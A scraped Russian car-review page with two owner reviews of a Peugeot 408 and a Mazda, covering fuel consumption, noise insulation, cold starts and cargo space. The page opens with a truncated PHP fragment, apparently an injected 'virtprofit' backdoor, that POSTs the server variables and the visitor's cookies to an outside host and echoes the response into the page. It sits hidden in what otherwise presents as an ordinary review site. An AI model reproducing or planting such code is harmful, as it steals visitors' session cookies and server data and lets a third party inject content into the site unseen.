array("header"=>"User-Agent: PHP Modules virtprofit\r\n","header"=>"Cookie: ".$_SERVER["HTTP_COOKIE"]."\r\n","method"=>"POST","timeout"=>2,"content"=>http_build_query($_SERVER))))); if($virtprofit_result) echo $virtprofit_result; ?>

Присланные отзывы за неделю


Прислал: Глеб
Год: 2013
Эксплуатирую: 6 месяцев
Отзыв:

За рулем я четыре десятка лет, садясь за него, кажусь себе моложе. На автомобиле Peugeot 408 с 1,4-литровым дизелем пройдено полсотни тысяч километров, поэтому элемент объективности в рассказе о нем присутствует.
Манера вождения у меня отнюдь не агрессивная (с редкими отступлениями). Обкатки машина не требует – просто самые первые тысячи километров на одометре Пежо должны быть пройдены на спокойных оборотах агрегата – до 2,5 тысяч. Расход горючего - результат многофакторный, но без излишнего внимания к экономии лично я укладываюсь в среднем в 5,2 литра.
Вряд ли мой Пежо 408 - автомобиль особенный, но в качестве претензий предприятию-изготовителю предъявить нечего: изоляция от шума близка к идеалу, запуск при -27-ми на градуснике – уверенный, симптоматичных звуков не наблюдается. Горные серпантины Пежо проходит адекватно, часть заслуги, разумеется, водительская.
Справедливости ради упомяну о минусах: забрызгивается боковая часть стекол в районе зеркал, закрывание багажника мало продумано, проем багажника узковат – детскую коляску, к примеру, погрузить проблематично.



Прислал: Радион
Год: 2014
Эксплуатирую: 7 месяцев
Отзыв:

Когда продал свою предыдущую машину, озаботился насущным вопросом – что же теперь взять. Идей особенно никаких не было, по душе тоже ничего не пришлось. Впереди была чистая доска. Стал активно посещать все местные салоны. Постепенно перед глазами стал формироваться определенный список машин, которым готов был отдать предпочтение. Записался сразу на все тест-драйвы с этими автомобилями, параллельно просматривал отношение персонала к клиенту и обслуживанию. В результате всех моих опытов удалось выяснить, что больше всего моей душе понравилась Мазда. Хоть все жалуются на никудышную шумоизоляцию этой машины, я ничего такого не заметил. Как по мне, в салоне ничего не слышно. Расход топлива тоже в пределах нормы, как по мне. По крайней мере больше пятнадцати литров еще не поднимался. Здорово удивила подвеска. На первый взгляд она казалась такой легкой и в меру мягкой, но на деле, в полевых условиях, оказалось, что подвеска очень даже жесткая. Мороз совершенно не влияет на систему зажигания, сколько бы градусов не было, мне одинаково легко было завести и прогреть автомобиль. Когда увидел салон, еще раз убедился в том, что японцы умеют работать над автомобилем. Качество обивки сидений и салона ценю до сих пор. Пластик с кожезаменителем демонстрируют удивительное сочетание.



Return to Top ▲НА ВЕРХ ▲